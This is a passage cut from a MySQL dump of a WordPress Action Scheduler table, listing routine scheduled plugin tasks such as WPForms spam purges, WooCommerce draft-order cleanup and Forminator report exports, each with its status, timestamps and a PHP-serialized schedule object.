00:34:12','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747076652;s:18:\"\0*\0first_timestamp\";i:1662377283;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747076652;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',10,1,'2025-05-12 19:26:35','2025-05-13 00:56:35',0,NULL,10),(155238,'wpforms_process_forms_locator_scan','complete','2025-05-12 19:04:12','2025-05-13 00:34:12','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747076652;s:18:\"\0*\0first_timestamp\";i:1665439018;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747076652;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-12 19:26:35','2025-05-13 00:56:35',0,NULL,10),(155240,'wpforms_process_purge_spam','complete','2025-05-12 19:04:12','2025-05-13 00:34:12','{\"tasks_meta_id\":48}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747076652;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747076652;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-12 19:26:35','2025-05-13 00:56:35',0,NULL,10),(155241,'wpforms_process_purge_spam','complete','2025-05-12 19:04:12','2025-05-13 00:34:12','{\"tasks_meta_id\":47}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747076652;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747076652;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-12 19:26:35','2025-05-13 00:56:35',0,NULL,10),(155673,'wp_mail_smtp_admin_notifications_update','complete','2025-05-13 19:26:35','2025-05-14 00:56:35','[22]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747164395;s:18:\"\0*\0first_timestamp\";i:1703215344;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747164395;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',6,1,'2025-05-13 19:30:27','2025-05-14 01:00:27',0,NULL,10),(155674,'wcfmvm_membership_scheduler','complete','2025-05-13 19:26:35','2025-05-14 00:56:35','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747164395;s:18:\"\0*\0first_timestamp\";i:1645095415;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747164395;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2025-05-13 19:30:27','2025-05-14 01:00:27',0,NULL,10),(155675,'woocommerce_cleanup_draft_orders','complete','2025-05-13 19:26:35','2025-05-14 00:56:35','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747164395;s:18:\"\0*\0first_timestamp\";i:1662377283;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747164395;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',10,1,'2025-05-13 19:30:27','2025-05-14 01:00:27',0,NULL,10),(155676,'wpforms_process_forms_locator_scan','complete','2025-05-13 19:26:35','2025-05-14 00:56:35','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747164395;s:18:\"\0*\0first_timestamp\";i:1665439018;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747164395;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-13 19:30:27','2025-05-14 01:00:27',0,NULL,10),(155678,'wpforms_process_purge_spam','complete','2025-05-13 19:26:35','2025-05-14 00:56:35','{\"tasks_meta_id\":48}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747164395;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747164395;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-13 19:30:27','2025-05-14 01:00:27',0,NULL,10),(155679,'wpforms_process_purge_spam','complete','2025-05-13 19:26:35','2025-05-14 00:56:35','{\"tasks_meta_id\":47}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747164395;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747164395;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-13 19:30:27','2025-05-14 01:00:27',0,NULL,10),(155686,'woocommerce_run_product_attribute_lookup_regeneration_callback','complete','2025-05-12 20:23:20','2025-05-13 01:53:20','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1747081400;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1747081400;}',7,1,'2025-05-12 20:23:21','2025-05-13 01:53:21',0,NULL,10),(155872,'wp_mail_smtp_admin_notifications_update','complete','2025-05-14 19:30:27','2025-05-15 01:00:27','[22]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747251027;s:18:\"\0*\0first_timestamp\";i:1703215344;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747251027;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',6,1,'2025-05-14 20:13:06','2025-05-15 01:43:06',0,NULL,10),(155873,'wcfmvm_membership_scheduler','complete','2025-05-14 19:30:27','2025-05-15 01:00:27','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747251027;s:18:\"\0*\0first_timestamp\";i:1645095415;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747251027;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2025-05-14 20:13:06','2025-05-15 01:43:06',0,NULL,10),(155874,'woocommerce_cleanup_draft_orders','complete','2025-05-14 19:30:27','2025-05-15 01:00:27','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747251027;s:18:\"\0*\0first_timestamp\";i:1662377283;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747251027;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',10,1,'2025-05-14 20:13:06','2025-05-15 01:43:06',0,NULL,10),(155875,'wpforms_process_forms_locator_scan','complete','2025-05-14 19:30:27','2025-05-15 01:00:27','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747251027;s:18:\"\0*\0first_timestamp\";i:1665439018;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747251027;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-14 20:13:06','2025-05-15 01:43:06',0,NULL,10),(155877,'wpforms_process_purge_spam','complete','2025-05-14 19:30:27','2025-05-15 01:00:27','{\"tasks_meta_id\":48}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747251027;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747251027;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-14 20:13:06','2025-05-15 01:43:06',0,NULL,10),(155878,'wpforms_process_purge_spam','complete','2025-05-14 19:30:27','2025-05-15 01:00:27','{\"tasks_meta_id\":47}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747251027;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747251027;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-14 20:13:06','2025-05-15 01:43:06',0,NULL,10),(155946,'wp_mail_smtp_admin_notifications_update','complete','2025-05-15 20:13:06','2025-05-16 01:43:06','[22]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747339986;s:18:\"\0*\0first_timestamp\";i:1703215344;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747339986;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',6,1,'2025-05-16 05:44:41','2025-05-16 11:14:41',0,NULL,10),(155947,'wcfmvm_membership_scheduler','complete','2025-05-15 20:13:06','2025-05-16 01:43:06','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747339986;s:18:\"\0*\0first_timestamp\";i:1645095415;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747339986;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,1,'2025-05-16 05:44:41','2025-05-16 11:14:41',0,NULL,10),(155948,'woocommerce_cleanup_draft_orders','complete','2025-05-15 20:13:06','2025-05-16 01:43:06','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747339986;s:18:\"\0*\0first_timestamp\";i:1662377283;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747339986;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',10,1,'2025-05-16 05:44:41','2025-05-16 11:14:41',0,NULL,10),(155949,'wpforms_process_forms_locator_scan','complete','2025-05-15 20:13:06','2025-05-16 01:43:06','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747339986;s:18:\"\0*\0first_timestamp\";i:1665439018;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747339986;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-16 05:44:41','2025-05-16 11:14:41',0,NULL,10),(155951,'wpforms_process_purge_spam','complete','2025-05-15 20:13:06','2025-05-16 01:43:06','{\"tasks_meta_id\":48}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747339986;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747339986;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-16 05:44:41','2025-05-16 11:14:41',0,NULL,10),(155952,'wpforms_process_purge_spam','complete','2025-05-15 20:13:06','2025-05-16 01:43:06','{\"tasks_meta_id\":47}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747339986;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747339986;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,1,'2025-05-16 05:44:41','2025-05-16 11:14:41',0,NULL,10),(156053,'wp_mail_smtp_admin_notifications_update','pending','2025-05-17 05:44:41','2025-05-17 11:14:41','[22]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747460681;s:18:\"\0*\0first_timestamp\";i:1703215344;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747460681;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',6,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL,10),(156054,'wcfmvm_membership_scheduler','pending','2025-05-17 05:44:41','2025-05-17 11:14:41','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747460681;s:18:\"\0*\0first_timestamp\";i:1645095415;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747460681;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',5,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL,10),(156055,'woocommerce_cleanup_draft_orders','pending','2025-05-17 05:44:41','2025-05-17 11:14:41','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747460681;s:18:\"\0*\0first_timestamp\";i:1662377283;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747460681;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',10,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL,10),(156056,'wpforms_process_forms_locator_scan','pending','2025-05-17 05:44:41','2025-05-17 11:14:41','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747460681;s:18:\"\0*\0first_timestamp\";i:1665439018;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747460681;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL,10),(156057,'forminator_daily_cron','pending','2025-05-17 05:44:41','2025-05-17 11:14:41','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747460681;s:18:\"\0*\0first_timestamp\";i:1738700463;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747460681;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',11,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL,10),(156058,'wpforms_process_purge_spam','pending','2025-05-17 05:44:41','2025-05-17 11:14:41','{\"tasks_meta_id\":48}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747460681;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747460681;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL,10),(156059,'wpforms_process_purge_spam','pending','2025-05-17 05:44:41','2025-05-17 11:14:41','{\"tasks_meta_id\":47}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747460681;s:18:\"\0*\0first_timestamp\";i:1727383912;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747460681;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',9,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL,10),(156123,'forminator_action_scheduler_cleanup','complete','2025-05-16 18:31:16','2025-05-17 00:01:16','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747420276;s:18:\"\0*\0first_timestamp\";i:1699918262;s:13:\"\0*\0recurrence\";i:7200;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747420276;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:7200;}',11,1,'2025-05-16 18:31:58','2025-05-17 00:01:58',0,NULL,10),(156130,'forminator_general_data_protection_cleanup','complete','2025-05-16 18:44:41','2025-05-17 00:14:41','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747421081;s:18:\"\0*\0first_timestamp\";i:1699918262;s:13:\"\0*\0recurrence\";i:3600;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747421081;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}',11,1,'2025-05-16 18:46:08','2025-05-17 00:16:08',0,NULL,10),(156139,'forminator_process_report','complete','2025-05-16 18:32:58','2025-05-17 00:02:58','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747420378;s:18:\"\0*\0first_timestamp\";i:1699918282;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747420378;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 18:34:01','2025-05-17 00:04:01',0,NULL,10),(156140,'forminator_send_export','complete','2025-05-16 18:32:58','2025-05-17 00:02:58','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747420378;s:18:\"\0*\0first_timestamp\";i:1699918272;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747420378;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 18:34:01','2025-05-17 00:04:01',0,NULL,10),(156141,'forminator_action_scheduler_cleanup','pending','2025-05-16 20:31:58','2025-05-17 02:01:58','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747427518;s:18:\"\0*\0first_timestamp\";i:1699918262;s:13:\"\0*\0recurrence\";i:7200;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747427518;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:7200;}',11,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL,10),(156142,'forminator_process_report','complete','2025-05-16 18:35:01','2025-05-17 00:05:01','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747420501;s:18:\"\0*\0first_timestamp\";i:1699918282;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747420501;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 18:46:08','2025-05-17 00:16:08',0,NULL,10),(156143,'forminator_send_export','complete','2025-05-16 18:35:01','2025-05-17 00:05:01','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747420501;s:18:\"\0*\0first_timestamp\";i:1699918272;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747420501;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 18:46:08','2025-05-17 00:16:08',0,NULL,10),(156144,'forminator_process_report','complete','2025-05-16 18:47:08','2025-05-17 00:17:08','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747421228;s:18:\"\0*\0first_timestamp\";i:1699918282;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747421228;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 18:50:42','2025-05-17 00:20:42',0,NULL,10),(156145,'forminator_send_export','complete','2025-05-16 18:47:08','2025-05-17 00:17:08','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747421228;s:18:\"\0*\0first_timestamp\";i:1699918272;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747421228;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 18:50:42','2025-05-17 00:20:42',0,NULL,10),(156146,'forminator_general_data_protection_cleanup','pending','2025-05-16 19:46:08','2025-05-17 01:16:08','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747424768;s:18:\"\0*\0first_timestamp\";i:1699918262;s:13:\"\0*\0recurrence\";i:3600;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747424768;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}',11,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL,10),(156147,'forminator_process_report','complete','2025-05-16 18:51:42','2025-05-17 00:21:42','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747421502;s:18:\"\0*\0first_timestamp\";i:1699918282;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747421502;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 18:55:56','2025-05-17 00:25:56',0,NULL,10),(156148,'forminator_send_export','complete','2025-05-16 18:51:42','2025-05-17 00:21:42','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747421502;s:18:\"\0*\0first_timestamp\";i:1699918272;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747421502;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 18:55:56','2025-05-17 00:25:56',0,NULL,10),(156149,'forminator_process_report','complete','2025-05-16 18:56:56','2025-05-17 00:26:56','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747421816;s:18:\"\0*\0first_timestamp\";i:1699918282;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747421816;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 18:56:56','2025-05-17 00:26:56',0,NULL,10),(156150,'forminator_send_export','complete','2025-05-16 18:56:56','2025-05-17 00:26:56','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747421816;s:18:\"\0*\0first_timestamp\";i:1699918272;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747421816;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 18:56:56','2025-05-17 00:26:56',0,NULL,10),(156151,'forminator_process_report','complete','2025-05-16 18:57:56','2025-05-17 00:27:56','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747421876;s:18:\"\0*\0first_timestamp\";i:1699918282;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747421876;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 19:01:01','2025-05-17 00:31:01',0,NULL,10),(156152,'forminator_send_export','complete','2025-05-16 18:57:56','2025-05-17 00:27:56','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747421876;s:18:\"\0*\0first_timestamp\";i:1699918272;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747421876;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 19:01:01','2025-05-17 00:31:01',0,NULL,10),(156153,'forminator_process_report','complete','2025-05-16 19:02:01','2025-05-17 00:32:01','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747422121;s:18:\"\0*\0first_timestamp\";i:1699918282;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747422121;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 19:03:39','2025-05-17 00:33:39',0,NULL,10),(156154,'forminator_send_export','complete','2025-05-16 19:02:01','2025-05-17 00:32:01','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747422121;s:18:\"\0*\0first_timestamp\";i:1699918272;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747422121;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 19:03:39','2025-05-17 00:33:39',0,NULL,10),(156155,'forminator_process_report','complete','2025-05-16 19:04:39','2025-05-17 00:34:39','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747422279;s:18:\"\0*\0first_timestamp\";i:1699918282;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747422279;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 19:13:15','2025-05-17 00:43:15',0,NULL,10),(156156,'forminator_send_export','complete','2025-05-16 19:04:39','2025-05-17 00:34:39','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747422279;s:18:\"\0*\0first_timestamp\";i:1699918272;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747422279;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 19:13:15','2025-05-17 00:43:15',0,NULL,10),(156157,'forminator_process_report','complete','2025-05-16 19:14:15','2025-05-17 00:44:15','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747422855;s:18:\"\0*\0first_timestamp\";i:1699918282;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747422855;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 19:14:45','2025-05-17 00:44:45',0,NULL,10),(156158,'forminator_send_export','complete','2025-05-16 19:14:15','2025-05-17 00:44:15','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747422855;s:18:\"\0*\0first_timestamp\";i:1699918272;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747422855;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 19:14:45','2025-05-17 00:44:45',0,NULL,10),(156159,'forminator_process_report','complete','2025-05-16 19:15:45','2025-05-17 00:45:45','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747422945;s:18:\"\0*\0first_timestamp\";i:1699918282;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747422945;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 19:18:02','2025-05-17 00:48:02',0,NULL,10),(156160,'forminator_send_export','complete','2025-05-16 19:15:45','2025-05-17 00:45:45','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1747422945;s:18:\"\0*\0first_timestamp\";i:1699918272;s:13:\"\0*\0recurrence\";i:60;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1747422945;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:60;}',11,1,'2025-05-16 19:18:02','2025-05-17 00:48:02',0,NULL,10),(156161,'forminator_process_report','complete','2025-05-16 